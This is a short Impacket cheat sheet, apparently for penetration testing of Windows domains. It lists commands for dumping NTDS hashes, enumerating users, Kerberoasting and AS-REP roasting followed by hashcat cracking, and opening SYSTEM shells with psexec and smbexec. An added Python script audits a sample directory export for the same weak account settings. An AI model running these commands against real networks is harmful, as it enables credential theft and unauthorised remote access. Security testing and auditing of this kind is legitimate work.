Impacket
Impacket is a collection of Python classes for working with network protocols.

Dump hashes

impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL

Users

This script will gather data about the domain’s users and their corresponding email addresses.
GetADUsers.py -all -dc-ip <ip> <domain>/<user>:<pw>
This example will try to find and fetch Service Principal Names that are associated with normal user accounts.
GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<pw>
-> Crack hash e.g. using hashcat, to obtain passwords
An application that communicates with the Security Account Manager Remote interface from the MSRPC suite.
samrdump.py <domain>
This example will attempt to list and get TGTs for those users that have the property ‘Do not require Kerberos preauthentication’ set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR.
GetNPUsers.py <domain>/<user> -no-pass
-> Crack hash e.g. using hashcat
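
A defender-side check for the two account conditions that GetUserSPNs.py and GetNPUsers.py look for, as an added example (not part of the original page or of Impacket): it flags enabled user accounts with UF_DONT_REQUIRE_PREAUTH set or with a servicePrincipalName in a directory export. The record layout, function names and sample accounts are constructed for illustration.

```python
# Added example: audit a directory export for Kerberos-exposed user accounts.
# The record layout (dicts with sAMAccountName, userAccountControl and
# servicePrincipalName) and the sample accounts below are constructed.

# userAccountControl bit flags (documented Active Directory values)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_DONT_REQUIRE_PREAUTH = 0x400000


def audit_account(record):
    """Return the list of findings for one exported account record."""
    uac = int(record.get("userAccountControl", 0))
    findings = []
    # Disabled accounts and non-user (e.g. computer) accounts are skipped.
    if (uac & UF_ACCOUNTDISABLE) or not (uac & UF_NORMAL_ACCOUNT):
        return findings
    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("preauth-not-required")
    if record.get("servicePrincipalName"):
        findings.append("spn-on-user-account")
    return findings


def audit_export(records):
    """Map sAMAccountName -> findings for every account that has any."""
    report = {}
    for record in records:
        findings = audit_account(record)
        if findings:
            report[record["sAMAccountName"]] = findings
    return report


# Constructed sample export
SAMPLE_EXPORT = [
    {"sAMAccountName": "alice", "userAccountControl": 512},
    {"sAMAccountName": "svc_backup", "userAccountControl": 4194816},  # 0x400200
    {"sAMAccountName": "svc_sql", "userAccountControl": 66048,
     "servicePrincipalName": ["MSSQLSvc/db01.example.local:1433"]},
    {"sAMAccountName": "old_svc", "userAccountControl": 514,  # disabled
     "servicePrincipalName": ["HTTP/legacy.example.local"]},
    {"sAMAccountName": "WS01$", "userAccountControl": 4096,  # computer account
     "servicePrincipalName": ["HOST/ws01.example.local"]},
]

if __name__ == "__main__":
    for name, findings in audit_export(SAMPLE_EXPORT).items():
        print(f"{name}: {', '.join(findings)}")
```

Accounts reported as preauth-not-required should have that setting cleared unless a legacy client depends on it, and user accounts carrying an SPN need long random passwords or a managed service account.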

Shell (psexec.py)

PSEXEC like functionality example using RemComSvc. -> Get a shell as "nt authority\system"
sudo psexec.py [<domain>/]<user>:[<pw>]@<ip>

SMB (smbexec.py)

sudo smbexec.py <user>:<pw>@<target>